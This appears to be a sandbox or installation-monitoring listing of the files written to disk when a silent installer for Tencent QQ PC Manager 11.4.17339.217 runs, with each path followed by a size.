    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPConfig.dat (704 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1093.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMIEMalRtpPlugin\QMIEMalRtpPlugin.dll (252 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMDnsMonitor\QMDnsMonitor.dll (2840 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDeskTopGC.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\qqpcmgr.dat (712 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\ProcessNameList.xml (30 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SoftMove.png (622 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMVulPlugin\QMVulPlugin.tpc (671 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1225.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Uninst.exe (10899 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1223.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysOptimize\QMTraceClear.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVE.dll (2662 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\PhotoCraftPlugin.png (615 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\HPScanUIPlugin\HPScanUIPlugin.tpc (711 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\tpkcom.dll (1748 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\MyPhone_Notify.ico (292 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.dll (3201 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TVL00003.tvl (8 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\libpng.dll (936 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupGiftBagMgr\GameSpeedupGiftBagMgr.rdb (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\extract.dll (3275 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMScriptHost.dll (3562 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1109.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\npQMExtensionsMozilla.dll (1960 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\exnscan64.dll (5143 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\FaceMask71.png (660 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubRdbs\speedupmsg.tpc (710 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\AutoTaskConfig.bat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_558.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMAdBlock.png (653 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\YLZTConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\DownloaderMgrUI\DownloaderMgrUI.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1083.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGuide.exe (2050 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virdex02.def (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMIESafeDll.dll (4562 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1605.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgrWList.etf (633 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\GarbageSoftInfo.xml (18 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1404.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftConfig.rdb (75 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCMgr.exe (161 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1408.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1003.dat (6 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTencentNews.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTencentNews.exe (4882 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_668.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\HomePageRecommendItemsRes.zip (8 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\StartupMgr.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMobileFlux\QMNetMobileFluxDll.dll (1319 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMForbiddenWinKey.dll (463 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\TPSConfig.etf (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinic.exe (9570 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1103.dat (446 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\setup.xml (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\arkGraphic.dll (2208 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCTray.rdb (122 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1032.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCRealTimeSpeedup.dat (728 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibwhite.xml (26 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.dll (2920 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\libexpatw.dll (1566 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRtpCheck.dll (3419 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ScUrConfig.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysmalwarejmp\SysMalwareJmp.dll (1061 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameSpeedup.dat (712 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPTool.exe (144 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_2061.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMCommon.dll (6388 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\dr.dll (4735 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\Bin\SSOCommon.dll (11809 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GF.dll (18769 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\QQPCMgrUpdate.exe (6662 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\libjpegturbo.dll (3622 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\TencentNews.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMCheckNetwork.exe (1346 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCTray.exe (4426 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1094.dat (443 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\sBoth_Disconnected.png (10 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\libexpatw.dll (1196 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPluginMgr.dll (10191 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMLoader\QQPCDetector.dll (7829 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.tpc (591 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.dll (11150 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\HPScanUIPlugin\HPScanUIPlugin.dll (6942 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmspeedupplugin\speeduprocket\SpeedupRocket.rdb (7972 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TVL00000.tvl (11 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10523.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRecommender.dll (3882 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1226.dat (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSWebMon64.dat (1697 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\TSVulFWX64.DAT (137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupExposure\GameExposureCfg.xml (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMContextUninstall.dll (581 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.tpc (676 bytes)
    %Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine\CommonIcon\exe_gray.ico (82 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1101.dat (446 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\support.etf (10 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_11.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FtSysIconGF.rdb (134 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_891.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield256.png (4 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMHIPSEngine.dll (48 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFTSysShortTask.exe (2248 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GarbageCleanerScript.dat (40 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\SMFilter.etf (769 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSignScan.exe (3428 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\MalWare.tpc (702 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCClinicNet.png (883 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\RICHED20.DLL (9767 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDrvPerfMon.dll (1556 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virpe01.def (1723 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVUpload.dll (5765 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\wifigx.png (800 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_565.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\FilterService.ini (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSClinicWebFix.dll (2435 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QMNetMonDll.dll (768 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SMobileAssisCfg.etf (323 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\libjpegturbo.dll (4319 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMProviderUpdate.EXE (967 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\jgImage.dll (851 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\IEStartPage(big).png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\Common.dll (17427 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRouterMgr.rdb (249 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\tinyxml.dll (1452 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\SysHomePage.rdb (6435 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\GF.dll (19385 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1015.dat (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMMalCoreCfgV1.dat (3714 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\IEStartPageConfig.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1105.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\libexpatw.dll (691 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_112.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.policy (808 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10007.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPersonalCenter.exe (4662 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibpw.xml (305 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.rdb (137 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMClinicTrayPlugin\QMClinicTrayPlugin.rdb (163 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHipsNotifyReport.dat (744 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysgarbagejmp\SysGarbageJmp.dll (1056 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCClinicNet\QQPCClinicNet.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_120.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCB2AndroidJmp.png (276 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQRepair.exe (3502 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupExposure\GameSpeedupExposure.rdb (222 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10485.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\msvcp80.dll (7937 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\QQPCCommonMgr.rdb (15196 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulPage.dll (6558 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_479.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCLeakScan.exe (8300 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\pluginctrl.xml (31 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1405.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.64.prf (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.rdb (136 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\GameLogo\defaultlogo.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysgarbagejmp\SysCleanPage.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.tpc (705 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinicHelper64.exe (1550 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmpredownload\QMPreDownload.dll (1883 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_794.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_13.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1228.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_862.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\HPVulScan\HPVulScan.dll (184 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\OperationFileCloudMgr.dll (2875 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdFilter.exe (5041 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\NetRepair.rdb (178 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\PluginPackage\InstallCfg.xml (156 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1070.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10492.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloadStrategy.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1227.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\SpeedupMsg.dll (3088 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_559.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\jgImage.dll (45 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\TraceClear\traceclear.tpc (687 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tsmcp.DAT (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMTrojanScan\QMTrojanScan.dll (10367 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCLaunch.exe (25 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\StartupMgr.rdb (7320 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAVCleanDr.dll (2054 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_949.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMClinicsettingcenter\QMClinicSettingCenter.dll (1415 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\QMDataUpdate.dll (1527 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\tinyxml.dll (1153 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\FileSmash.png (314 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCLeakScan.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\MemDefragWhiteList.etf (211 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.dll (7604 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\HW_GameScore.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGCShellExt64.dll (5823 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAdBlock.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMNewsTips\QMNewsTips.dll (6208 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_141.png (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\SuperKillModules.dll (2457 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMPerfCtrl\QMPerf.dll (2130 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1818.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMNetworkMgr.dll (1646 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\8.0.50727.4053.Policy (804 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr03.def (14 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\AdFilterConfigFile.xml (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.dll (7701 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\GarbageCleaner.dll (9986 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QQPCNetFlow.dat (832 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCMgr.rdb (7386 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_15.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1607.dat (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCAVSetting.dat (696 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPConfig.exe (3126 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1104.dat (454 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QOLogo\QQPCLaunch.png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\version.ini (39 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMIEProtectIo.dll (1308 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\Common.dll (15392 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCmgrInstallGuide.exe (5224 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\syshomepage.tpc (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTipsConfig.dat (9 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_2016.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\Common.dll (17486 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1301.dat (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\AdfilterExtension.crx (213 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysSpeedUp\SysSpeedUp.dll (1598 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.dll (3944 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1879.png (1 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SysOptimize.png (597 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMClinicsettingcenter\QMClinicSettingCenter.rdb (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupExposure\GameSpeedupExposure.tpc (953 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\NiZhanConfig.etf (3 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOClient.dll (4264 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHIPSPolicyEng.dll (6630 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\sTurnOnAdapter.png (16 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFIXATDLL.DLL (8927 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\xpword.png (5 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1977.png (2 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSafeBoxHelperDll.dll (2504 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QQPCNetFlow.rdb (6307 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr04.def (7 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.tpc (723 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\QQPCMgrUpdate.dat (656 bytes)
    %Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virswf01.def (656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\8.0.50727.4053.cat (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (264 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0L2B8HQ7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\qqpcmgr_v11.4.17339.217_90008_Silence.exe (1658515 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9G23GV1J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KT6ZWPUN\desktop.ini (67 bytes)
    %Documents and Settings%\All Users\Start Menu\Set Program Access and Defaults.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (1 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Documents and Settings%\All Users\Start Menu\Windows Update.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4D27WPM7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (198 bytes)
    %WinDir%\WinSxS\InstallTemp\578184\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993 (4 bytes)
    %WinDir%\WinSxS\InstallTemp\584679\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.cat (7 bytes)
    %WinDir%\WinSxS\InstallTemp\590281\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
